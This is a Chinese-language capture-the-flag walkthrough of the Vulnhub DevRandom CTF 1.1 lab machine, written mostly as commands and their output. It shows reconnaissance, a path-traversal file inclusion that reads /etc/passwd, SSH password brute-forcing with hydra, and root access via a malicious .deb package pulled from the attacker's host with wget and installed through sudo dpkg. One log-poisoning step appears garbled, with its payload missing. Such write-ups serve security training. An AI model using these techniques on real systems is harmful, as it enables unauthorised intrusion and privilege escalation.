Vulnhub靶机DevRandom CTF1.1详细测试过程

DevRandom CTF: 1.1

靶机信息

名称：DevRandom CTF: 1.1
地址：

1. https://www.vulnhub.com/entry/devrandom-ctf-11,450/

复制代码

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                       
4.                                                                                                                                                             
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:03      1      60  Unknown vendor                                                                                          
10. 192.168.56.100  08:00:27:9c:b2:21      1      60  PCS Systemtechnik GmbH                                                                                   
11. 192.168.56.254  08:00:27:ef:c4:95      1      60  PCS Systemtechnik GmbH                                                                                   

复制代码

利用Kali Linux内置的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 04:13 EDT
4. Nmap scan report for driftingblues.box (192.168.56.254)
5. Host is up (0.00012s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
9. | ssh-hostkey:
10. |   2048 83e5a151b1f698d319e75910f7f4e85e (RSA)
11. |   256 b2a679c3ad2fbacc02b3420da2a39e60 (ECDSA)
12. |_  256 ec1fd4299fa5aeca93f4a86bfd614445 (ED25519)
13. 80/tcp open  http    Apache httpd
14. | http-robots.txt: 3 disallowed entries
15. |_/wp-admin/ /wp-login.php /?include=info
16. |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
17. |_http-server-header: Apache
18. MAC Address: 08:00:27:EF:C4:95 (Oracle VirtualBox virtual NIC)
19. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

复制代码

NMAP扫描结果表明目标主机有2个开放端口：22(ssh),80(http)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ curl http://192.168.56.254/robots.txt                       
3. User-agent: *
4. Disallow: /wp-admin/
5. Disallow: /wp-login.php
6. Disallow: /?include=info

复制代码

但是访问/wp-admin/,/wp-login.php，返回的页面内容并非正常wordpress
访问：

1. http://192.168.56.254/?include=info

复制代码

访问该地址时,从页面源代码得知CMS是wordpress,但是主机地址却配置有问题，因为该方向的分析没有价值。

1. ing: 0 !important;
2. }
3. </style>
4.         <link rel='stylesheet' id='wp-block-library-css'  href='http://192.168.1.214/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' media='all' />
5. <link rel='stylesheet' id='twentytwenty-style-css'  href='http://192.168.1.214/wp-content/themes/twentytwenty/style.css?ver=1.1' media='all' />

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ nikto -h http://192.168.56.254     
3. - Nikto v2.5.0
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.254
6. + Target Hostname:    192.168.56.254
7. + Target Port:        80
8. + Start Time:         2023-05-27 04:17:39 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache
11. + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
12. + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
13. + No CGI Directories found (use '-C all' to force check all possible dirs)
14. + /robots.txt: Entry '/wp-login.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
15. + RFC-1918 /?include=info/: IP address found in the 'link' header. The IP is "192.168.1.214". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
16. + /robots.txt: Entry '/?include=info/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
17. + /robots.txt: Entry '/wp-admin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
18. + /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
19. + /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
20. + /secret/: Directory indexing found.
21. + /secret/: This might be interesting.

复制代码

nikto工具发现了/secret目录，访问该目录得到3个文件，其中一个文件大小为0，可不予考虑：

1. ──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ curl http://192.168.56.254/secret/                                                            
3. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
4. <html>
5. <head>
6.   <title>Index of /secret</title>
7. </head>
8. <body>
9. <h1>Index of /secret</h1>
10.   <table>
11.    <tr><th valign="top"><img src="https://www.cnblogs.com/icons/blank.gif" alt="[ICO]"></th><th><a target="_blank" href="https://www.cnblogs.com/?C=N;O=D">Name</a></th><th><a target="_blank" href="https://www.cnblogs.com/?C=M;O=A">Last modified</a></th><th><a target="_blank" href="https://www.cnblogs.com/?C=S;O=A">Size</a></th><th><a target="_blank" href="https://www.cnblogs.com/?C=D;O=A">Description</a></th></tr>
12.    <tr><th colspan="5"><hr></th></tr>
13. <tr><td valign="top"><img src="https://www.cnblogs.com/icons/back.gif" alt="[PARENTDIR]"></td><td><a target="_blank" href="https://www.cnblogs.com/">Parent Directory</a></td><td> </td><td align="right">  - </td><td> </td></tr>
14. <tr><td valign="top"><img src="https://www.cnblogs.com/icons/unknown.gif" alt="[   ]"></td><td><a target="_blank" href="https://www.cnblogs.com/arizona">arizona</a></td><td align="right">2020-03-19 16:52  </td><td align="right"> 42 </td><td> </td></tr>
15. <tr><td valign="top"><img src="https://www.cnblogs.com/icons/unknown.gif" alt="[   ]"></td><td><a target="_blank" href="https://www.cnblogs.com/nucleus">nucleus</a></td><td align="right">2020-03-19 16:51  </td><td align="right">  0 </td><td> </td></tr>
16. <tr><td valign="top"><img src="https://www.cnblogs.com/icons/unknown.gif" alt="[   ]"></td><td><a target="_blank" href="https://www.cnblogs.com/wrap">wrap</a></td><td align="right">2020-03-22 08:37  </td><td align="right">6.4K</td><td> </td></tr>
17.    <tr><th colspan="5"><hr></th></tr>
18. </table>
19. </body></html>

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ curl http://192.168.56.254/secret/arizona
3. API:4395874598yt3r9iy98r7r90t87treterrrrr
4.                                                                                                                                                             
5. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
6. └─$ curl http://192.168.56.254/secret/wrap   
9. <p> john:Password123

复制代码

wrap文件中有用户名和密码，但是尝试发现并不能登录ssh

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ ssh john@192.168.56.254                                       
3. The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
4. ED25519 key fingerprint is SHA256:AnG5VJ89V2BLxl3FruwQRAYjvRcsk/DSGj3zNJrfMyY.
5. This host key is known by the following other names/addresses:
6.     ~/.ssh/known_hosts:1: [hashed name]
7. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
8. Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
9. john@192.168.56.254's password:
10. Permission denied, please try again.

复制代码

这也许是个陷阱。

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js     
3. ===============================================================
4. Gobuster v3.5
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.254
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.5
13. [+] Extensions:              php,txt,html,sh,js
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/05/27 04:21:35 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.php                 (Status: 403) [Size: 199]
19. /.html                (Status: 403) [Size: 199]
20. /index.php            (Status: 200) [Size: 74]
21. /wp-content           (Status: 301) [Size: 241] [--> http://192.168.56.254/wp-content/]
22. /wp-login.php         (Status: 200) [Size: 74]
23. /license.txt          (Status: 200) [Size: 19935]
24. /wp-includes          (Status: 301) [Size: 242] [--> http://192.168.56.254/wp-includes/]
25. /log.php              (Status: 200) [Size: 2324657]
26. /readme.html          (Status: 200) [Size: 7368]
27. /robots.txt           (Status: 200) [Size: 86]
28. /wp-trackback.php     (Status: 200) [Size: 74]
29. /secret               (Status: 301) [Size: 237] [--> http://192.168.56.254/secret/]
30. /secret.php           (Status: 200) [Size: 38]

复制代码

Gobuster工具扫描出文件/log.php
从页面内容可知:view acces.log file : /var/www/html/access.log
该日志文件记录web访问日志，因此可以通过在请求头中插入php代码实现shell的获取
可以用burpsuite拦截请求
在user-agent字段中替换为

1. [/code]但是此时再访问/log.php,发现返回 的内容仅仅是：view acces.log file : /var/www/html/access.log
2. 还是回到robots.txt中
3. [code]http://192.168.56.254/?include=info

复制代码

这里应该存在本地文件包含漏洞，但是注意可能当前文件所在的位置较深，因此需要多层../

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ curl http://192.168.56.254/?include=../../../../../../../../../etc/passwd
4. root:x:0:0:root:/root:/bin/bash
5. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
6. bin:x:2:2:bin:/bin:/usr/sbin/nologin
7. sys:x:3:3:sys:/dev:/usr/sbin/nologin
8. sync:x:4:65534:sync:/bin:/bin/sync
9. games:x:5:60:games:/usr/games:/usr/sbin/nologin
10. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
11. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
12. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
13. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
14. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
15. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
16. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
17. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
18. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
19. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
20. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
21. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
22. systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
23. systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
24. systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
25. _apt:x:103:65534::/nonexistent:/usr/sbin/nologin
26. messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
27. sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
28. john:x:1000:1000:john,,,:/home/john:/bin/bash
29. systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
30. lisa:x:1001:1001:,,,:/home/lisa:/bin/bash
31. henri:x:1002:1002:,,,:/home/henri:/bin/bash
32. mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
33. proftpd:x:107:65534::/run/proftpd:/usr/sbin/nologin
34. ftp:x:108:65534::/srv/ftp:/usr/sbin/nologin
35. wordpressftp:x:1003:1003:,,,:/var/www/html:/bin/rbash
36. victor:x:1004:1004:,,,:/home/victor:/bin/bash
37. trevor:x:1005:1005:,,,:/home/trevor:/bin/bash

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ cat user.dict                                                            
3. trevor
4. victor
5. john
6. lisa
7. henri

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ hydra -l trevor  -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.254

复制代码

尝试破解每个用户的密码，得到trevor的密码qwertyuiop[]，如果用rockyou.txt会用比较长的时间来破解

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ ssh trevor@192.168.56.254     
3. trevor@192.168.56.254's password:
4. Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
6. The programs included with the Debian GNU/Linux system are free software;
7. the exact distribution terms for each program are described in the
8. individual files in /usr/share/doc/*/copyright.
10. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
11. permitted by applicable law.
12. Last login: Mon Mar 23 17:54:37 2020
13. trevor@lucifer:~$ ls -alh
14. total 28K
15. drwxr-x--- 4 trevor trevor 4.0K Mar 25  2020 .
16. drwxr-xr-x 7 root   root   4.0K Mar 23  2020 ..
17. -rw-r--r-- 1 trevor trevor  220 Mar 23  2020 .bash_logout
18. -rw-r--r-- 1 trevor trevor 3.5K Mar 23  2020 .bashrc
19. drwx------ 3 trevor trevor 4.0K Mar 23  2020 .gnupg
20. drwxr-xr-x 3 trevor trevor 4.0K Mar 23  2020 .local
21. -rw-r--r-- 1 trevor trevor  807 Mar 23  2020 .profile
22. trevor@lucifer:~$ sudo -l
23. Matching Defaults entries for trevor on lucifer:
24.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
26. User trevor may run the following commands on lucifer:
27.     (root) NOPASSWD: /usr/bin/dpkg

复制代码

提权

安装fpm

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ sudo gem install fpm     

复制代码

根据GTFOBINS步骤创建deb包

1. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
2. └─$ TF=$(mktemp -d)
3.                                                                                                                                                             
4. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
5. └─$ echo 'exec /bin/sh' > $TF/x.sh
6.                                                                                                                                                             
7. ┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
8. └─$ fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
10. Created package {:path=>"x_1.0_all.deb"}
11.                                                 

复制代码

将上述deb上传到目标主机/tmp目录

1. trevor@lucifer:/tmp$ wget http://192.168.56.253:8000/x_1.0_all.deb
2. --2023-05-27 04:38:20--  http://192.168.56.253:8000/x_1.0_all.deb
3. Connecting to 192.168.56.253:8000... connected.
4. HTTP request sent, awaiting response... 200 OK
5. Length: 1092 (1.1K) [application/vnd.debian.binary-package]
6. Saving to: ‘x_1.0_all.deb’
8. x_1.0_all.deb                           100%[============================================================================>]   1.07K  --.-KB/s    in 0s      
10. 2023-05-27 04:38:20 (37.1 MB/s) - ‘x_1.0_all.deb’ saved [1092/1092]
12. trevor@lucifer:/tmp$ sudo dpkg -i x_1.0_all.deb
13. Selecting previously unselected package x.
14. (Reading database ... 40777 files and directories currently installed.)
15. Preparing to unpack x_1.0_all.deb ...
16. # cd /root
17. # ls -alh
18. total 40K
19. drwx------  4 root root 4.0K May 27 04:30 .
20. drwxr-xr-x 22 root root 4.0K Mar 19  2020 ..
21. -rw-------  1 root root  573 Mar 26  2020 .bash_history
22. -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
23. -rw-r--r--  1 root root   89 Mar 22  2020 flag.txt
24. drwx------  3 root root 4.0K Mar 20  2020 .gnupg
25. -rw-------  1 root root   36 May 27 04:30 .lesshst
26. drwxr-xr-x  3 root root 4.0K Mar 19  2020 .local
27. -rw-------  1 root root  513 Mar 18  2020 .mysql_history
28. -rw-r--r--  1 root root  148 Aug 17  2015 .profile
29. # cat flag.txt
30. WELl DONE
32. echo "THISISTHEFLAGTHISISTHEFLAG\!\!\!\@\@\@###" | base64 > thisistheflag.txt
33. #

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！